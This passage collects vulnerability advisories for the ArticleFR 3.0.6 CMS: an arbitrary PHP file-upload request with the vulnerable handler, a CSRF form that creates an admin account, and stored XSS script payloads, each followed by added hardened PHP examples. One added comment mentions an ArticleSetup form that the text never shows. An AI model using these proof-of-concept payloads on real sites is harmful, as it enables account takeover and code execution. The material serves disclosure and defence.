Cookie: GEAR=local-5422433b500446ead50002d4; PHPSESSID=uc86lsmbm53d73d572tvvec3v4; _ga=GA1.2.884814947.1419214773; __unam=bd22dea-14a6fcadd31-42cba495-9; _gat=1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

-----------------------------277651700022570
Content-Disposition: form-data; name="myVideo"; filename="img.php"
Content-Type: image/gif

<?php 
phpinfo(); 
?>
-----------------------------277651700022570
Content-Disposition: form-data; name=""

undefined
-----------------------------277651700022570
Content-Disposition: form-data; name=""

undefined
-----------------------------277651700022570--



- RESPONSE:

HTTP/1.1 200 OK
Date: Mon, 22 Dec 2014 03:10:30 GMT
Server: Apache/2.2.15 (Red Hat)
Content-Type: text/html
Vary: Accept-Encoding
Accept-Ranges: none
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 36

[String_Random].php

- Shell link: http://target.org/articlefr2/dashboard/videos/[String_Random].php
- Vulnerable file: articlefr/dashboard/videouploader.php
- Vulnerable code:

<?php
$output_dir = dirname(dirname(__FILE__)) . "/videos_repository/";
if(isset($_FILES["myVideo"]))
{
    $ret = array();

    $error =$_FILES["myVideo"]["error"];

    if(!is_array($_FILES["myVideo"]["name"]))
    {
        // the client-supplied extension is kept verbatim; nothing checks it
        $fileName = $_FILES["myVideo"]["name"];
        $extension = pathinfo($fileName, PATHINFO_EXTENSION);
        $newFileName = md5(uniqid() . $fileName) . '.' . $extension;

        move_uploaded_file($_FILES["myVideo"]["tmp_name"], $output_dir.$newFileName);
        $ret[]= $newFileName;
    }

    echo $newFileName;
}
?>
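The handler above randomises the file name but keeps whatever extension the client sent, so an upload named img.php is stored as a .php file under the web root. The following is an added example, not articleFR's code, of the same handler with an extension allowlist, a content check on the bytes actually uploaded, a server-chosen extension and a non-executable mode. The field name myVideo and the videos_repository directory come from the advisory; the allowed types, the size limit, the JSON response shape and the function name are this example's own choices.

```php
<?php
// Added example, not articleFR's own code: a hardened replacement for the
// videouploader.php handler. Requires PHP 7+ (random_bytes) and ext/fileinfo.

declare(strict_types=1);

const MAX_UPLOAD_BYTES = 200 * 1024 * 1024;

// Extension => MIME types we are willing to store. Nothing the web server would
// execute is in this list, and the stored name never uses the client's extension
// directly; it uses the allowlisted key that matched.
const ALLOWED_VIDEO_TYPES = [
    'mp4'  => ['video/mp4'],
    'webm' => ['video/webm'],
    'ogv'  => ['video/ogg', 'application/ogg'],
];

function storeUploadedVideo(array $file, string $outputDir): array
{
    if (is_array($file['name'] ?? null)) {
        return ['ok' => false, 'error' => 'multiple files not accepted'];
    }
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return ['ok' => false, 'error' => 'upload failed'];
    }
    if (!is_uploaded_file($file['tmp_name'])) {       // only files PHP received in this request
        return ['ok' => false, 'error' => 'not an uploaded file'];
    }
    if ($file['size'] > MAX_UPLOAD_BYTES) {
        return ['ok' => false, 'error' => 'file too large'];
    }

    // The client's filename and Content-Type header are untrusted. Decide from the
    // extension allowlist and from the bytes on disk, and require the two to agree.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset(ALLOWED_VIDEO_TYPES[$ext])) {
        return ['ok' => false, 'error' => 'extension not allowed'];
    }
    $detected = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!in_array($detected, ALLOWED_VIDEO_TYPES[$ext], true)) {
        return ['ok' => false, 'error' => 'content does not match extension'];
    }

    // Server-generated name with the allowlisted extension; the original's
    // md5(uniqid() . $fileName) kept whatever extension the client sent.
    $newName = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = rtrim($outputDir, '/') . '/' . $newName;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        return ['ok' => false, 'error' => 'could not store file'];
    }
    chmod($dest, 0640);                               // readable by the server, never executable
    return ['ok' => true, 'name' => $newName];
}

// Entry point, matching the original's isset($_FILES["myVideo"]) branch.
if (isset($_FILES['myVideo'])) {
    header('Content-Type: application/json');
    $outputDir = dirname(__DIR__) . '/videos_repository/';
    echo json_encode(storeUploadedVideo($_FILES['myVideo'], $outputDir));
}
```

Two points the code cannot enforce on its own: the upload directory should be served with script execution disabled (or kept outside the document root and streamed through a download script), so that even a mistake in the allowlist does not yield code execution, and the handler must sit behind the dashboard's authentication, since the advisory's request carries only a session cookie.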



::REFERENCE::
- http://www.itas.vn/news/itas-team-phat-hien-lo-hong-arbitrarily-file-upload-trong-articlefr-cms-71.html


::DISCLAIMER::
THE INFORMATION PRESENTED HEREIN IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO, ANY IMPLIED WARRANTIES AND MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE OR WARRANTIES OF QUALITY OR COMPLETENESS. THE INFORMATION PRESENTED HERE IS A SERVICE TO THE SECURITY COMMUNITY AND THE PRODUCT VENDORS. ANY APPLICATION OR DISTRIBUTION OF THIS INFORMATION CONSTITUTES ACCEPTANCE AS IS, AND AT THE USER'S OWN RISK.
            

ArticleFR 3.0.6 CSRF Add Admin Exploit


Vendor: Free Reprintables
Product web page: http://www.freereprintables.com
Affected version: 3.0.6

Summary: A lightweight fully featured content (article / video)
management system. Comes with a pluginable and multiple module
framework system.

Desc: The application allows users to perform certain actions
via HTTP requests without performing any validity checks to
verify the requests. This can be exploited to perform certain
actions with administrative privileges if a logged-in user
visits a malicious web site.

Tested on: nginx/1.6.2
           PHP


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2015-5248
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5248.php


21.06.2015

--


<html>
  <body>
    <form action="http://127.0.0.1/dashboard/users/create/" method="POST">
      <input type="hidden" name="username" value="thricer" />
      <input type="hidden" name="name" value="The_Hacker" />
      <input type="hidden" name="password" value="s3cr3t" />
      <input type="hidden" name="email" value="lab@zeroscience.mk" />
      <input type="hidden" name="website" value="http://www.zeroscience.mk" />
      <input type="hidden" name="blog" value="zsl" />
      <input type="hidden" name="membership" value="admin" />
      <input type="hidden" name="isactive" value="active" />
      <input type="hidden" name="submit" value="Create" />
      <input type="submit" value="Request" />
    </form>
  </body>
</html>
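The ArticleSetup adminsettings.php and ArticleFR dashboard/users/create/ forms above both succeed because the server accepts any POST that arrives with the victim's session cookie. The following is an added example, not code from either project, of the standard synchronizer-token defence in PHP: a per-session random token that every state-changing form must echo back, plus an Origin/Referer check and a SameSite session cookie as defence in depth. The field name csrf_token, the helper names and the handler skeleton are this example's assumptions; the update, pass1 and pass2 fields are the ones in the advisory's forged form.

```php
<?php
// Added example, not ArticleSetup's or ArticleFR's own code: CSRF protection
// for state-changing handlers. Requires PHP 7.3+ for the array form of
// session_set_cookie_params().

declare(strict_types=1);

// A SameSite cookie stops most browsers from attaching the session to a
// cross-site form post in the first place; the token below is the real control.
session_set_cookie_params(['httponly' => true, 'secure' => true, 'samesite' => 'Lax']);
session_start();

// One token per session, from a CSPRNG, stored server-side.
function csrfToken(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Hidden field to embed in every form that changes state.
function csrfField(): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrfToken(), ENT_QUOTES | ENT_HTML5, 'UTF-8') . '">';
}

// A page on another origin cannot read the victim's session, so it cannot
// supply this value. hash_equals() keeps the comparison constant-time.
function csrfValid(array $post): bool
{
    $expected = $_SESSION['csrf_token'] ?? '';
    $given    = $post['csrf_token'] ?? '';
    return is_string($given) && $expected !== '' && hash_equals($expected, $given);
}

// Browsers send Origin (or at least Referer) on cross-site POSTs; reject
// requests whose source host is not this site. Missing headers are rejected too,
// because a state change is not worth guessing about.
function sameOrigin(array $server, string $expectedHost): bool
{
    $source = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? '';
    if ($source === '') {
        return false;
    }
    return strcasecmp((string) parse_url($source, PHP_URL_HOST), $expectedHost) === 0;
}

// Guard for a handler such as admin/adminsettings.php.
function handleAdminSettings(array $post, array $server): string
{
    if (($server['REQUEST_METHOD'] ?? '') !== 'POST') {
        http_response_code(405);
        return 'method not allowed';
    }
    if (!csrfValid($post) || !sameOrigin($server, $server['SERVER_NAME'] ?? '')) {
        http_response_code(403);
        return 'request rejected: missing or invalid CSRF token';
    }
    if (($post['update'] ?? '') === '1' && ($post['pass1'] ?? '') === ($post['pass2'] ?? '')) {
        // password update goes here, against the authenticated admin's own account
        return 'settings updated';
    }
    return 'nothing to do';
}
```

The same three functions protect dashboard/users/create/: emit csrfField() inside the legitimate form and call csrfValid() before creating the account. Rotating the token after a successful login (regenerate the session id as well) keeps a token captured before authentication from being useful afterwards.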

##################################################################


ArticleFR 3.0.6 Multiple Script Injection Vulnerabilities


Vendor: Free Reprintables
Product web page: http://www.freereprintables.com
Affected version: 3.0.6

Summary: A lightweight fully featured content (article / video)
management system. Comes with a pluginable and multiple module
framework system.

Desc: ArticleFR suffers from multiple stored cross-site scripting
vulnerabilities. The issues are triggered when input passed via the
POST parameter 'name' in Categories, POST parameters 'title' and
'rel' in Links and GET parameter 'url' in PingServers module is
not properly sanitized before being returned to the user. This can
be exploited to execute arbitrary HTML and script code in a user's
browser session in context of an affected site.

Tested on: nginx/1.6.2
           PHP


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2015-5247
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5247.php


21.06.2015

--


POST 'name' Categories Stored XSS:
----------------------------------
<html>
  <body>
    <form action="http://127.0.0.1/dashboard/settings/categories/" method="POST">
      <input type="hidden" name="name" value='"><script>alert(1)</script>' />
      <input type="hidden" name="parent" value="0" />
      <input type="hidden" name="submit" value="Add" />
      <input type="submit" value="XSS #1" />
    </form>
  </body>
</html>


POST 'title', 'rel' Links Stored XSS:
------------------------------------
<html>
  <body>
    <form action="http://127.0.0.1/dashboard/settings/links/" method="POST">
      <input type="hidden" name="title" value='"><script>alert(2)</script>' />
      <input type="hidden" name="url" value="http://www.zeroscience.mk" />
      <input type="hidden" name="rel" value='"><script>alert(3)</script>' />
      <input type="hidden" name="submit" value="Add" />
      <input type="submit" value="XSS #2 and #3" />
    </form>
  </body>
</html>


POST 'url' Ping Server Reflected XSS:
-------------------------------------
<html>
  <body>
    <form action="http://127.0.0.1/dashboard/tools/pingservers/" method="POST">
      <input type="hidden" name="url" value='http://www.zeroscience.mk"><script>alert(4)</script>' />
      <input type="hidden" name="submit" value="Add" />
      <input type="submit" value="XSS #4" />
    </form>
  </body>
</html>
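The four forms above inject the same kind of payload into three different output contexts: element text (category name, link title), the rel attribute, and a URL attribute. Encoding that is correct for one context is not enough for the others, so the following is an added example, not ArticleFR's code, of a small set of context-specific output helpers, run against inputs constructed from the advisory's payloads. The helper names are this example's own.

```php
<?php
// Added example, not ArticleFR's own code: context-aware output encoding for
// the stored values the advisory shows being echoed back unescaped.

declare(strict_types=1);

// Text-node and quoted-attribute context: encode the HTML metacharacters.
// ENT_QUOTES covers the '"' that closes the attribute in the advisory's payloads.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// href/src context: encoding alone is not enough, because javascript: is
// perfectly valid attribute text. Accept only absolute http(s) URLs that pass
// filter_var, then encode; anything else collapses to a harmless '#'.
function safeUrl(string $value): string
{
    if (filter_var($value, FILTER_VALIDATE_URL) === false) {
        return '#';
    }
    $scheme = strtolower((string) parse_url($value, PHP_URL_SCHEME));
    return in_array($scheme, ['http', 'https'], true) ? e($value) : '#';
}

// rel is a space-separated token list with a small vocabulary: allowlist the
// tokens instead of encoding free text.
function safeRel(string $value): string
{
    $allowed = ['nofollow', 'noopener', 'noreferrer', 'external'];
    $tokens  = array_intersect(preg_split('/\s+/', strtolower(trim($value))), $allowed);
    return implode(' ', array_unique($tokens));
}

// Rendering the Links module's stored values into the page template.
function renderLink(string $title, string $url, string $rel): string
{
    return '<a href="' . safeUrl($url) . '" rel="' . safeRel($rel) . '">' . e($title) . '</a>';
}

function renderCategory(string $name): string
{
    return '<li class="category">' . e($name) . '</li>';
}

// Constructed inputs reproducing the advisory's four payloads.
$categoryName = '"><script>alert(1)</script>';
$linkTitle    = '"><script>alert(2)</script>';
$linkRel      = '"><script>alert(3)</script>';
$pingUrl      = 'http://www.zeroscience.mk"><script>alert(4)</script>';

echo renderCategory($categoryName), PHP_EOL;
echo renderLink($linkTitle, $pingUrl, $linkRel), PHP_EOL;
```

With these helpers the quote and angle brackets in payloads 1 and 2 come out as entities inside the element text, payload 3 contributes no rel tokens at all, and payload 4 either fails URL validation or, if a permissive filter lets it through, is entity-encoded so that the injected attribute never closes. Encoding at output time rather than at storage time is what makes this hold for every page that later displays the value, including the dashboard pages the advisory targets.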